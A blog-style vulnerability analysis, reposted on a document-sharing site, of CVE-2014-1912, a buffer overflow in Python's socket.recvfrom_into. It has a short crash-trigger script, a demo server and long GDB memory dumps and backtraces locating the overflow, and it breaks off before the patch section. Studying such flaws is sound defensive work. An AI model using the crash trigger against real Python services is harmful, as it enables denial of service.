版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
标题:【原创】CVE-2014-1912漏洞介绍与简单分析作者:cumirror前段时间,CVE上收录了Python缓冲区溢出漏洞CVE-2014-1912。正好自己在学Pyhon,于是跟踪分析了下。自己是个新手,对于shellcode编写还没掌握,所以这里侧重于漏洞的原理介绍和溢出点的定位,如有不足和错误之处还请大家指点,谢谢。1.漏洞介绍这个漏洞产生于Python
socket模块中的recvfrom_into函数,该函数在处理过程中,对recvlen和buf.len的判断存在问题。该漏洞会影响Python
2.7.7/3.4.4之前的版本。你也可以运行如下脚本进行检查,如果产生段错误,则说明存在这个漏洞。代码:import
socketr,
w
=
socket.socketpair()w.send(b'X'
*
1024)r.recvfrom_into(bytearray(),
1024)2.漏洞溢出点分析
a)调试环境
系统:Ubuntu
13.04
Python:2.7.4
调试器:GDB
(安装python的扩展:sudo
apt-get
install
gdb
python2.7-dbg)
b)demo
serve.py代码:import
socket,
array
host
=
socket.gethostname()port
=
40000s
=
socket.socket()s.bind((host,
port))#mybuf
=
bytearray(b'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB')#print
hex(id(mybuf))0xb74bba20:
0x08290160b74bba40
0x7957ad87000000060xb74bba30:
0x6f64747300000000
0x00000000000074750xb74bba40:
0x0000000000000000
0x0000000000000000(gdb)
x
/10xg
0x0a1c19080xa1c1908:
0x726f724242424242
0x00000039b75330000xa1c1918:
0x0000000200000000
0x00000006000000010xa1c1928:
0x0a1c193800000010
0x0a1c1950000000000xa1c1938:
0x0101007f00000002
0x00000000000000000xa1c1948:
0x000000390000038e
0x000000020a1c1910(gdb)
x
/10c
0x0a1c19080xa1c1908:
66
'B'
66
'B'
66
'B'
66
'B'
66
'B'
114
'r'
111
'o'
114
'r'0xa1c1910:
0
'\000'
48
'0'(gdb)
break
if
((char*)0x0a1c1908)[0]
!=
'B'Breakpoint
1
at
0xb77a2424(gdb)
break
sock_recvfrom_into.64651
Breakpoint
2
at
0x806e4d3:
file
../Modules/socketmodule.c,
line
2720.(gdb)
cContinuing.
3)python
client.py,发送超长的数据。
4)查看溢出点代码:Breakpoint
2,
sock_recvfrom_into.64651
(s=0xb74b2610,
args=(<array.array
at
remote
0xb74bba00>,
1024),
kwds=0x0)
at
../Modules/socketmodule.c:27202720
../Modules/socketmodule.c:
No
such
file
or
directory.(gdb)
bt#0
sock_recvfrom_into.64651
(s=0xb74b2610,
args=(<array.array
at
remote
0xb74bba00>,
1024),
kwds=0x0)
at
../Modules/socketmodule.c:2720#1
0x080b6bde
in
call_function
(oparg=<optimized
out>,
pp_stack=0xbfb2a58c)
at
../Python/ceval.c:4021#2
PyEval_EvalFrameEx
(f=f@entry=Frame
0xa1be5c4,
for
file
server.py,
line
18,
in
<module>
(),
throwflag=throwflag@entry=0)
at
../Python/ceval.c:2666#3
0x0811fae9
in
PyEval_EvalCodeEx
(co=co@entry=0xb750ecc8,
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
locals=locals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
args=args@entry=0x0,
argcount=argcount@entry=0,
kws=kws@entry=0x0,
kwcount=kwcount@entry=0,
defs=defs@entry=0x0,
defcount=defcount@entry=0,
closure=closure@entry=0x0)
at
../Python/ceval.c:3253#4
0x081836c7
in
PyEval_EvalCode
(co=co@entry=0xb750ecc8,
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
locals=locals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)})
at
../Python/ceval.c:667#5
0x08183b7d
in
run_mod.42872
(mod=mod@entry=0xa1c01f0,
filename=filename@entry=0xbfb2c35e
"server.py",
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
locals=locals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
flags=flags@entry=0xbfb2a79c,
arena=arena@entry=0xa1d1398)
at
../Python/pythonrun.c:1365#6
0x080a6029
in
PyRun_FileExFlags
(fp=fp@entry=0xa1be5b8,
filename=filename@entry=0xbfb2c35e
"server.py",
start=start@entry=257,
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
locals=locals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
---Type
<return>
to
continue,
or
q
<return>
to
quit---qQuit(gdb)
cContinuing.Breakpoint
1,
0xb77a2424
in
__kernel_vsyscall
()(gdb)
bt#0
0xb77a2424
in
__kernel_vsyscall
()#1
0xb777cc91
in
recvfrom
()
from
/lib/i386-linux-gnu/libpthread.so.0#2
0x0806e2fb
in
sock_recvfrom_guts
(s=0xb77a2424
<__kernel_vsyscall+16>,
s@entry=0xb74b2610,
cbuf=0xa1c1908
"AAAAAAAr",
len=1024,
flags=0,
addr=addr@entry=0xbfb2a478)
at
/usr/include/i386-linux-gnu/bits/socket2.h:76#3
0x0806e57f
in
sock_recvfrom_into.64651
(s=0xb74b2610,
args=(<array.array
at
remote
0xb74bba00>,
1024),
kwds=0x0)
at
../Modules/socketmodule.c:2747#4
0x080b6bde
in
call_function
(oparg=<optimized
out>,
pp_stack=0xbfb2a58c)
at
../Python/ceval.c:4021#5
PyEval_EvalFrameEx
(f=f@entry=Frame
0xa1be5c4,
for
file
server.py,
line
18,
in
<module>
(),
throwflag=throwflag@entry=0)
at
../Python/ceval.c:2666#6
0x0811fae9
in
PyEval_EvalCodeEx
(co=co@entry=0xb750ecc8,
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
locals=locals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
args=args@entry=0x0,
argcount=argcount@entry=0,
kws=kws@entry=0x0,
kwcount=kwcount@entry=0,
defs=defs@entry=0x0,
defcount=defcount@entry=0,
closure=closure@entry=0x0)
at
../Python/ceval.c:3253#7
0x081836c7
in
PyEval_EvalCode
(co=co@entry=0xb750ecc8,
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
locals=locals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)})
at
../Python/ceval.c:667#8
0x08183b7d
in
run_mod.42872
(mod=mod@entry=0xa1c01f0,
filename=filename@entry=0xbfb2c35e
"server.py",
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
locals=locals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host':
'cumirror',
'mybuf':
<array.array
at
remote
0xb74bba00>,
'__name__':
'__main__',
'array':
<module
at
remote
0xb74a0a1c>,
'__doc__':
None,
'addr':
('',
50195)},
flags=flags@entry=0xbfb2a79c,
arena=arena@entry=0xa1d1398)
at
../Python/pythonrun.c:1365#9
0x080a6029
in
PyRun_FileExFlags
(fp=fp@entry=0xa1be5b8,
filename=filename@entry=0xbfb2c35e
"server.py",
start=start@entry=257,
globals=globals@entry={'c':
<_socketobject
at
remote
0xb74a9294>,
'socket':
<module
at
remote
0xb74a0bcc>,
'__builtins__':
<module
at
remote
0xb751311c>,
'__file__':
'server.py',
's':
<_socketobject
at
remote
0xb74a92cc>,
'__package__':
None,
'port':
40000,
'host'---Type
<return>
to
continue,
or
q
<return>
to
quit---qQuit(gdb)
x
/10c
0x0a1c19080xa1c1908:
65
'A'
65
'A'
65
'A'
65
'A'
65
'A'
65
'A'
65
'A'
114
'r'0xa1c1910:
0
'\000'
48
'0'3.漏洞原因与patch
通过上面的
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025年中职(机电技术应用)机械基础期末测试题及解析
- 2025年大二(旅游管理)景区规划与管理期末试题
- 2025年大学园艺学(园艺产品贮藏加工学)试题及答案
- 2026年审计咨询(审计服务)考题及答案
- 2025年高职第二学年(导游服务类)景区讲解综合测试试题及答案
- 2025年高职无人机应用技术(无人机工程创意)试题及答案
- 2025年中职网络技术(无线网络搭建)试题及答案
- 2026年海南体育职业技术学院高职单招职业适应性测试备考试题有答案解析
- 2026年福建体育职业技术学院单招职业技能考试模拟试题带答案解析
- 2026年滁州职业技术学院高职单招职业适应性测试备考题库有答案解析
- 假体丰胸培训课件
- 2024年高中语文选择性必修上册古诗文情境式默写(含答案)
- 部编人教版4年级上册语文期末复习(单元复习+专项复习)教学课件
- 2024-2025学年云南省玉溪市八年级(上)期末英语试卷(含答案无听力原文及音频)
- 《赢在责任心,胜在执行力》心得体会
- 凉山州 2024 年教师综合业务素质测试试卷初中物理
- 他汀不耐受的临床诊断与处理中国专家共识(2024)解读课件
- 学校石材工程投标书
- 低压电工证题库低压电工证考试题
- GB 5009.11-2024食品安全国家标准食品中总砷及无机砷的测定
- 全面风险清单-采购与业务外包管理风险(2023年11月-雷泽佳编制)
评论
0/150
提交评论